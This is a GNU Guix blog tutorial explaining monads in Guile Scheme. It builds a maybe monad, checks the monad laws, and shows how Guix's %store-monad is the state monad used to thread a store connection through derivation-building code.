In the last post, we briefly mentioned the with-store and run-with-store macros. Today, we'll be looking at those in further detail, along with the related monad library and the %store-monad!

Typically, we use monads to chain operations together, and the %store-monad is no different; it's used to combine operations that work on the Guix store (for instance, creating derivations, building derivations, or adding data files to the store).

However, monads are a little hard to explain, and from a distance, they seem to be quite incomprehensible. So, I want you to erase them from your mind for now. We'll come back to them later. And be aware that if you can't seem to get your head around them, it's okay; you can understand most of the architecture of Guix without understanding monads.

Yes, No, Maybe So

Let's instead implement another M of functional programming, maybe values, representing a value that may or may not exist. For instance, there could be a procedure that attempts to pop a stack, returning the result if there is one, or nothing if the stack has no elements.

maybe is a very common feature of statically-typed functional languages, and you'll see it all over the place in Haskell and OCaml code. However, Guile is dynamically typed, so we usually use ad-hoc #f values as the "null value" instead of a proper "nothing" or "none".

Just for fun, though, we'll implement a proper maybe in Guile. Fire up that REPL once again, and let's import a bunch of modules that we'll need:

(use-modules (ice-9 match)
             (srfi srfi-9))

We'll implement maybe as a record with two fields, is? and value. If the value contains something, is? will be #t and value will contain the thing in question, and if it's empty, is?'ll be #f.

(define-record-type <maybe>
  (make-maybe is? value)
  maybe?
  (is? maybe-is?)
  (value maybe-value))

Now we'll define constructors for the two possible states:

(define (something value)
  (make-maybe #t value))

(define (nothing)
  (make-maybe #f #f)) ;the value here doesn't matter; we'll just use #f

And make some silly functions that return optional values:

(define (remove-a str)
  (if (eq? (string-ref str 0) #\a)
      (something (substring str 1))
      (nothing)))

(define (remove-b str)
  (if (eq? (string-ref str 0) #\b)
      (something (substring str 1))
      (nothing)))

(remove-a "ahh")
⇒ #<<maybe> is?: #t value: "hh">

(remove-a "ooh")
⇒ #<<maybe> is?: #f value: #f>

(remove-b "bad")
⇒ #<<maybe> is?: #t value: "ad">

But what if we want to compose the results of these functions?

Keeping Your Composure

As you might have guessed, this is not fun. Cosplaying as a compiler backend typically isn't.

(let ((t1 (remove-a "abcd")))
  (if (maybe-is? t1)
      (remove-b (maybe-value t1))
      (nothing)))
⇒ #<<maybe> is?: #t value: "cd">

(let ((t1 (remove-a "bbcd")))
  (if (maybe-is? t1)
      (remove-b (maybe-value t1))
      (nothing)))
⇒ #<<maybe> is?: #f value: #f>

I can almost hear the heckling. Even worse, composing three:

(let* ((t1 (remove-a "abad"))
       (t2 (if (maybe-is? t1)
               (remove-b (maybe-value t1))
               (nothing))))
  (if (maybe-is? t2)
      (remove-a (maybe-value t2))
      (nothing)))
⇒ #<<maybe> is?: #t value: "d">

So, how do we go about making this more bearable? Well, one way could be to make remove-a and remove-b accept maybes:

(define (remove-a ?str)
  (match ?str
    (($ <maybe> #t str)
     (if (eq? (string-ref str 0) #\a)
         (something (substring str 1))
         (nothing)))
    (_ (nothing))))

(define (remove-b ?str)
  (match ?str
    (($ <maybe> #t str)
     (if (eq? (string-ref str 0) #\b)
         (something (substring str 1))
         (nothing)))
    (_ (nothing))))

Not at all pretty, but it works!

(remove-b (remove-a (something "abc")))
⇒ #<<maybe> is?: #t value: "c">

Still, our procedures now require quite a bit of boilerplate. Might there be a better way?

The Ties That >>= Us

First of all, we'll revert to our original definitions of remove-a and remove-b, that is to say, the ones that take a regular value and return a maybe.

(define (remove-a str)
  (if (eq? (string-ref str 0) #\a)
      (something (substring str 1))
      (nothing)))

(define (remove-b str)
  (if (eq? (string-ref str 0) #\b)
      (something (substring str 1))
      (nothing)))

What if tried introducing higher-order procedures (procedures that accept other procedures as arguments) into the equation? Because we're functional programmers and we have an unhealthy obsession with that sort of thing.

(define (maybe-chain maybe proc)
  (if (maybe-is? maybe)
      (proc (maybe-value maybe))
      (nothing)))

(maybe-chain (something "abc")
             remove-a)
⇒ #<<maybe> is?: #t value: "bc">

(maybe-chain (nothing)
             remove-a)
⇒ #<<maybe> is?: #f value: #f>

It lives! To make it easier to compose procedures like this, we'll define a macro that allows us to perform any number of sequenced operations with only one composition form:

(define-syntax maybe-chain*
  (syntax-rules ()
    ((_ maybe proc)
     (maybe-chain maybe proc))
    ((_ maybe proc rest ...)
     (maybe-chain* (maybe-chain maybe proc)
                   rest ...))))

(maybe-chain* (something "abad")
              remove-a
              remove-b
              remove-a)
⇒ #<<maybe> is?: #t value: "d">

Congratulations, you've just implemented the bind operation, commonly written as >>=, for our maybe type. And it turns out that a monad is just any container-like value for which >>= (along with another procedure called return, which wraps a given value in the simplest possible form of a monad) has been implemented.

A more formal definition would be that a monad is a mathematical object composed of three parts: a type, a bind function, and a return function. So, how do monads relate to Guix?

New Wheel, Old Wheel

Now that we've reinvented the wheel, we'd better learn to use the original wheel. Guix provides a generic, high-level monads library, along with the two generic monads %identity-monad and %state-monad, and the Guix-specific %store-monad. Since maybe is not one of them, let's integrate our version into the Guix monad system!

First we'll import the module that provides the aforementioned library:

(use-modules (guix monads))

To define a monad's behaviour in Guix, we simply use the define-monad macro, and provide two procedures: bind, and return.

(define-monad %maybe-monad
  (bind maybe-chain)
  (return something))

bind is just the procedure that we use to compose monadic procedure calls together, and return is the procedure that wraps values in the most basic form of the monad. A properly implemented bind and return must follow the so-called monad laws :

  1. (bind (return x) proc) must be equivalent to (proc x).
  2. (bind monad return) must be equivalent to just monad.
  3. (bind (bind monad proc-1) proc-2) must be equivalent to (bind monad (lambda (x) (bind (proc-1 x) proc-2))).

Let's verify that our maybe-chain and something procedures adhere to the monad laws:

(define (mlaws-proc-1 x)
  (something (+ x 1)))

(define (mlaws-proc-2 x)
  (something (+ x 2)))

;; First law: the left identity.
(equal? (maybe-chain (something 0)
                     mlaws-proc-1)
        (mlaws-proc-1 0))
⇒ #t

;; Second law: the right identity.
(equal? (maybe-chain (something 0)
                     something)
        (something 0))
⇒ #t

;; Third law: associativity.
(equal? (maybe-chain (maybe-chain (something 0)
                                  mlaws-proc-1)
                     mlaws-proc-2)
        (maybe-chain (something 0)
                     (lambda (x)
                       (maybe-chain (mlaws-proc-1 x)
                                    mlaws-proc-2))))
⇒ #t

Now that we know they're valid, we can use the with-monad macro to tell Guix to use these specific implementations of bind and return, and the >>= macro to thread monads through procedure calls!

(with-monad %maybe-monad
  (>>= (something "aabbc")
       remove-a
       remove-a
       remove-b
       remove-b))
⇒ #<<maybe> is?: #t value: "c">

We can also now use return:

(with-monad %maybe-monad
  (return 32))
⇒ #<<maybe> is?: #t value: 32>

But Guix provides many higher-level interfaces than >>= and return, as we will see. There's mbegin, which evaluates monadic expressions without binding them to symbols, returning the last one. This, however, isn't particularly useful with our %maybe-monad, as it's only really usable if the monadic operations within have side effects, just like the non-monadic begin.

There's also mlet and mlet*, which do bind the results of monadic expressions to symbols, and are essentially equivalent to a chain of (>>= MEXPR (lambda (BINDING) ...)):

;; This is equivalent...
(mlet* %maybe-monad ((str -> "abad") ;non-monadic binding uses the -> symbol
                     (str1 (remove-a str))
                     (str2 (remove-b str)))
  (remove-a str))
⇒ #<<maybe> is?: #t value: "d">

;; ...to this:
(with-monad %maybe-monad
  (>>= (return "abad")
       (lambda (str)
         (remove-a str))
       (lambda (str1)
         (remove-b str))
       (lambda (str2)
         (remove-a str))))

Various abstractions over these two exist too, such as mwhen (a when plus an mbegin), munless (an unless plus an mbegin), and mparameterize (dynamically-scoped value rebinding, like parameterize, in a monadic context). lift takes a procedure and a monad and creates a new procedure that returns a monadic value.

There are also interfaces for manipulating lists wrapped in monads; listm creates such a list, sequence turns a list of monads into a list wrapped in a monad, and the anym, mapm, and foldm procedures are like their non-monadic equivalents, except that they return lists wrapped in monads.

This is all well and good, you may be thinking, but why does Guix need a monad library, anyway? The answer is technically that it doesn't. But building on the monad API makes a lot of things much easier, and to learn why, we're going to look at one of Guix's built-in monads.

In a State

Guix implements a monad called %state-monad, and it works with single-argument procedures returning two values. Behold:

(with-monad %state-monad
  (return 33))
⇒ #<procedure 21dc9a0 at <unknown port>:1106:22 (state)>

The run-with-state value turns this procedure into an actually useful value, or, rather, two values:

(run-with-state (with-monad %state-monad (return 33))
  (list "foo" "bar" "baz"))
⇒ 33
⇒ ("foo" "bar" "baz")

What can this actually do for us, though? Well, it gets interesting if we do some >>=ing:

(define state-seq
  (mlet* %state-monad ((number (return 33)))
    (state-push number)))
result
⇒ #<procedure 7fcb6f466960 at <unknown port>:1484:24 (state)>

(run-with-state state-seq (list 32))
⇒ (32)
⇒ (33 32)

(run-with-state state-seq (list 30 99))
⇒ (30 99)
⇒ (33 30 99)

What is state-push? It's a monadic procedure for %state-monad that takes whatever's currently in the first value (the primary value) and pushes it onto the second value (the state value), which is assumed to be a list, returning the old state value as the primary value and the new list as the state value.

So, when we do (run-with-state result (list 32)), we're passing (list 32) as the initial state value, and then the >>= form passes that and 33 to state-push. What %state-monad allows us to do is thread together some procedures that require some kind of state, while essentially pretending the state value is stored globally, like you might do in, say, C, and then retrieve both the final state and the result at the end!

If you're a bit confused, don't worry. We'll write some of our own %state-monad-based monadic procedures and hopefully all will become clear. Consider, for instance, the Fibonacci sequence, in which each value is computed by adding the previous two. We could use the %state-monad to compute Fibonacci numbers by storing the previous number as the primary value and the number before that as the state value:

(define (fibonacci-thing value)
  (lambda (state)
    (values (+ value state)
            value)))

Now we can feed our Fibonacci-generating procedure the first value using run-with-state and the second using return:

(run-with-state
    (mlet* %state-monad ((starting (return 1))
                         (n1 (fibonacci-thing starting))
                         (n2 (fibonacci-thing n1)))
      (fibonacci-thing n2))
  0)
⇒ 3
⇒ 2

(run-with-state
    (mlet* %state-monad ((starting (return 1))
                         (n1 (fibonacci-thing starting))
                         (n2 (fibonacci-thing n1))
                         (n3 (fibonacci-thing n2))
                         (n4 (fibonacci-thing n3))
                         (n5 (fibonacci-thing n4)))
      (fibonacci-thing n5))
  0)
⇒ 13
⇒ 8

This is all very nifty, and possibly useful in general, but what does this have to do with Guix? Well, many Guix store-based operations are meant to be used in concert with yet another monad, called the %store-monad. But if we look at (guix store), where %store-monad is defined...

(define-alias %store-monad %state-monad)
(define-alias store-return state-return)
(define-alias store-bind state-bind)

It was all a shallow façade! All the "store monad" is is a special case of the state monad, where a value representing the store is passed as the state value.

Lies, Damned Lies, and Abstractions

We mentioned that, technically, we didn't need monads for Guix. Indeed, many (now deprecated) procedures take a store value as the argument, such as build-expression->derivation. However, monads are far more elegant and simplify store code by quite a bit.

build-expression->derivation, being deprecated, should never of course be used. For one thing, it uses the "quoted build expression" style, rather than G-expressions (we'll discuss gexps another time). The best way to create a derivation from some basic build code is to use the new-fangled gexp->derivation procedure:

(use-modules (guix gexp)
             (gnu packages irc))

(define symlink-irssi
  (gexp->derivation "link-to-irssi"
    #~(symlink #$(file-append irssi "/bin/irssi") #$output)))
⇒ #<procedure 7fddcc7b81e0 at guix/gexp.scm:1180:2 (state)>

You don't have to understand the #~(...) form yet, only everything surrounding it. We can see that this gexp->derivation returns a procedure taking the initial state (store), just like our %state-monad procedures did, and like we used run-with-state to pass the initial state to a %state-monad monadic value, we use our old friend run-with-store when we have a %store-monad monadic value!

(define symlink-irssi-drv
  (with-store store
    (run-with-store store
      symlink-irssi)))
⇒ #<derivation /gnu/store/q7kwwl4z6psifnv4di1p1kpvlx06fmyq-link-to-irssi.drv => /gnu/store/6a94niigx4ii0ldjdy33wx9anhifr25x-link-to-irssi 7fddb7ef52d0>

Let's just check this derivation is as expected by reading the code from the builder script.

(define symlink-irssi-builder
  (list-ref (derivation-builder-arguments symlink-irssi-drv) 1))

(call-with-input-file symlink-irssi-builder
  (lambda (port)
    (read port)))

⇒ (symlink
   "/gnu/store/hrlmypx1lrdjlxpkqy88bfrzg5p0bn6d-irssi-1.4.3/bin/irssi"
   ((@ (guile) getenv) "out"))

And indeed, it symlinks the irssi binary to the output path. Some other, higher-level, monadic procedures include interned-file, which copies a file from outside the store into it, and text-file, which copies some text into it. Generally, these procedures aren't used, as there are higher-level procedures that perform similar functions (which we will discuss later), but for the sake of this blog post, here's an example:

(with-store store
  (run-with-store store
    (text-file "unmatched-paren"
      "( <paren@disroot.org>")))
⇒ "/gnu/store/v6smacxvdk4yvaa3s3wmd54lixn1dp3y-unmatched-paren"

Conclusion

What have we learned about monads? The key points we can take away are:

  1. Monads are a way of composing together procedures and values that are wrapped in containers that give them extra context, like maybe values.
  2. Guix provides a high-level monad library that compensates for Guile's lack of static typing or an interface-like system.
  3. The (guix monads) module provides the state monad, which allows you to thread state through procedures, allowing you to essentially pretend it's a global variable that's modified by each procedure.
  4. Guix uses the store monad frequently to thread a store connection through procedures that need it.
  5. The store monad is really just the state monad in disguise, where the state value is used to thread the store object through monadic procedures.

If you've read this post in its entirety but still don't yet quite get it, don't worry. Try to modify and tinker about with the examples, and ask any questions on the IRC channel #guix:libera.chat and mailing list at help-guix@gnu.org, and hopefully it will all click eventually!

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64 and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource